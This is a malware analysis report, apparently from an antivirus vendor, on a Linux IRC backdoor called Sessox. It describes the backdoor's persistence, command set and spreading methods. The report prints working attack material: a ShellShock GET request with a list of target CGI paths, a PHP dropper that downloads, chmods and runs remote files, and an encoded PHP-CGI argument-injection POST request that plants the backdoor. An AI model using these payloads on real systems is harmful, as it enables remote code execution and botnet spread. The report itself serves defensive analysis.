A backdoor for Linux that receives commands from cybercriminals using a chat server supporting the IRC (Internet Relay Chat) protocol. Once the Trojan is launched on the infected computer, it registers itself in the autorun using the “/etc/init.d/rc.local” file or, if there is no file with such name, the “/etc/rc.conf” file. Then it reads the contents of its executable file “/tmp/Help1”, encrypts it with the base64 algorithm, and saves to the file “/tmp/Help1.z”. After that it performs the same actions for the “/tmp/Help2” and “/tmp/Help2.z” files. As a result, the Trojan establishes a connection with the command and control server sending it the following request:
PASS %pass%\nNICK %nick%\nUSER %user% localhost localhost :%uptime%\nwhere %pass% - "44", %nick%, %user%, %uptime% stand for the strings created using the following method:
char *GetUptime()
{
char *szUptime;
signed int i;
struct sysinfo info;
szUptime = (char *)malloc(0x15u);
i = 0;
memset(szUptime, 0, 0x15u);
do
szUptime[i++] = rand() % 26 + 'A';
while ( i < 20 );
*szUptime = 'm';
szUptime[1] = 'u';
szUptime[2] = 'm';
szUptime[3] = 'u';
szUptime[4] = '-';
sysinfo(&info);
if ( info.uptime > 0xD2F00 )
{
szUptime[5] = '[';
szUptime[6] = '1';
szUptime[7] = '0';
szUptime[8] = ']';
szUptime[9] = '-';
if ( info.uptime > 0x1A5E00 )
{
szUptime[6] = '2';
if ( info.uptime > 0x278D00 )
{
szUptime[6] = '3';
if ( info.uptime > 0x34BC00 )
{
szUptime[6] = '4';
if ( info.uptime > 0x41EB00 )
{
szUptime[6] = '5';
if ( info.uptime > 0x4F1A00 )
{
szUptime[6] = '6';
if ( info.uptime > 0x5C4900 )
{
szUptime[6] = '7';
if ( info.uptime > 0x697800 )
{
szUptime[6] = '8';
if ( info.uptime > 0x76A700 )
{
szUptime[6] = '9';
if ( info.uptime > 0x83D600 )
{
szUptime[6] = '1';
szUptime[8] = '0';
szUptime[9] = ']';
szUptime[10] = '-';
if ( info.uptime > 0xC5C100 )
{
szUptime[7] = '5';
if ( info.uptime > 0x107AC00 )
{
szUptime[6] = '2';
szUptime[7] = '0';
if ( info.uptime > 0x18B8200 )
{
szUptime[6] = '3';
if ( info.uptime > 0x20F5800 )
{
szUptime[6] = '4';
if ( info.uptime > 0x2932E00 )
szUptime[6] = '5';
}
}
}
}
}
}
}
}
}
}
}
}
}
}
return szUptime;
}The Trojan can execute the following commands:
| Command | Meaning |
|---|---|
| 376 | Specify the mode and log in the IRC channel |
| 433 | Forward the information about the computer’s working time (uptime) to the IRC channel |
| 422 | Specify the mode and log in the IRC channel |
| PING | Send the PONG reply |
| NICK | Change the nickname to the one specified in the command |
| PRIVMSG | Execute one of the special functions (see below) |
Special functions:
| Command | Meaning |
|---|---|
| PHPSCAN | Start a PHP scripts’ scan (PHP Scanner) |
| SOCKS5 | Start the proxy server (SOCKS5 Proxy) |
| SSSCAN | Start scanning for the ShellShock vulnerability (ShellShock Scanner) |
| WEBDOS | Launch an attack on the specified website using repeating GET requests (HTTP Flooder) |
By sending repeating GET requests to the website specified by criminals, the Trojan can launch an attack. Moreover, upon the criminals’ command, Linux.BackDoor.Sessox.1 can scan the attacked server for the ShellShock vulnerability. It allows to execute arbitrary code on the server. The Trojan has a list with files that can be used in the GET request:
/cgi-sys/entropysearch.cgi
/cgi-sys/defaultwebpage.cgi
/cgi-mod/index.cgi
/cgi-bin/test.cgi
/cgi-bin-sdb/printenv
/admin.cgi
/cgi-bin/bash
/cgi-bin/hello
/cgi-bin/helpme
/cgi-bin/info.sh
/cgi-bin/php5-cli?
/cgi-bin/php5?
/cgi-bin/test-cgi
/cgi-bin/test.sh
/cgi-sys/guestbook.cgi
/cgi-sys/php5?
/phppath/cgi_wrapper?
/phppath/php?
/tmUnblock.cgi
/cgi-bin/contact.cgi
/cgi-bin/defaultwebpage.cgi
/cgi-bin/env.cgi
/cgi-bin/forum.cgi
/cgi-bin/hello.cgi
/cgi-bin/index.cgi
/cgi-bin/login.cgi
/cgi-bin/main.cgi
/cgi-bin/meme.cgi
/cgi-bin/recent.cgi
/cgi-bin/sat-ir-web.pl
/cgi-bin/signon.cgi
/cgi-bin/test-cgi.pl
/cgi-bin/tools/tools.pl
/phppath/cgi_wrapper
/phppath/php
/cgi-sys/FormMail-clone.cgi
/xul/
/gitweb/
/gitweb.cgi
/cgi-bin/
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php4
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/firmwarecfg
/cgi-bin/%2f/admin.html
/cgi-bin/admin.html
/sys-cgi
/cgi-bin/tree.php
/cgi-bin/w3mman2html.cgi
/cgi-bin/status/status.cgiAs a workload, the following script is used for the requests’ execution:
$a = \"%s\";
$b = \"%s\";
$c = sys_get_temp_dir();
$d = \"%s\";
$e = \"%s\";
$f = \"chmod 777\";
$g = \"file_put_contents\";
$h = \"system\";
$i = \"file_exists\";
$j = \"fopen\";
if ($i($c . \"/$d\"))
{
exit(1);
}else{
echo($c);
$g(\"$c/$d\", $j(\"$a\", \"r\"));
$g(\"$c/$e\", $j(\"$b\", \"r\"));
$h(\"$f \" . $c .\"/$d\");
$h(\"$f \" . $c .\"/$e\");
$h($c . \"/$d\");
$h($c . \"/$e\");
}The links to the downloadable Trojan’s files are assigned to the a and b variables and the names, under which these files must be saved, are assigned to the d and e variables in the script.
On the basis of these data, the following GET request is generated:
GET %file% HTTP/1.0\r\nCookie: () { :;} ;echo;/usr/bin/php -r %script%\r\nReferer: () { :;} ;echo;/usr/local/bin/php -r %script%\r\n\r\nwhere %file% stands for one file from the list given below and %script% stands for the script specified above. For the host that receives GET requests, a random IP address is generated.
Using specifically created POST requests, the malware can execute a scan of PHP scripts to launch a third-party script on the compromised server. For the recipient host, a randomly generated IP address is chosen. To create the POST request, the following script is used:
<?php
$bufferf = '%s';
$bufferf2 = '%s';
$a = sys_get_temp_dir();
$b = \"%s\";
$c = \"%s\";
$d = \"chmod 777\";
$e = \"system\";
$f = \"file_put_contents\";
$g = \"base64_decode\";
$h = \"chmod\";\n$i = \"file_exists\";
if ($i($a . \"/$c\"))
{
exit(1);
}else{
echo($a);
$bufferf = $g($bufferf);
$bufferf2 = $g($bufferf2);
$f(\"$a/$b\", $bufferf);
$f(\"$a/$c\", $bufferf2);
$h ($a.\"/\".$b,0777);
$e(\"$d \" . $a .\"/$b\");
$h ($a.\"/\".$c,0777);
$e(\"$d \" . $a .\"/$c\");
$e($a . \"/$c\");
$e($a . \"/$b\");
exit(1);
}
?>where the data from the files /tmp/Help1.z and /tmp/Help2.z is assigned to the bufferf and bufferf2 variables correspondingly (the backdoor’s body in base64). The “Help1” and “Help2” data is assigned to the b and с variables.
The request can be sent to the following files:
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php5-cgi
/cgi-bin/php-cgi.binThen the script is inserted into the POST request:
POST %file%?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%67%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%6E HTTP/1.1\r\nHost: %ip%\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %len%\r\nConnection: close\r\n\r\n%script%where %file% stands for the file from the above list, %ip% stands for the random IP address, %len% stands for the size of the script, %script% stands for the script described above.
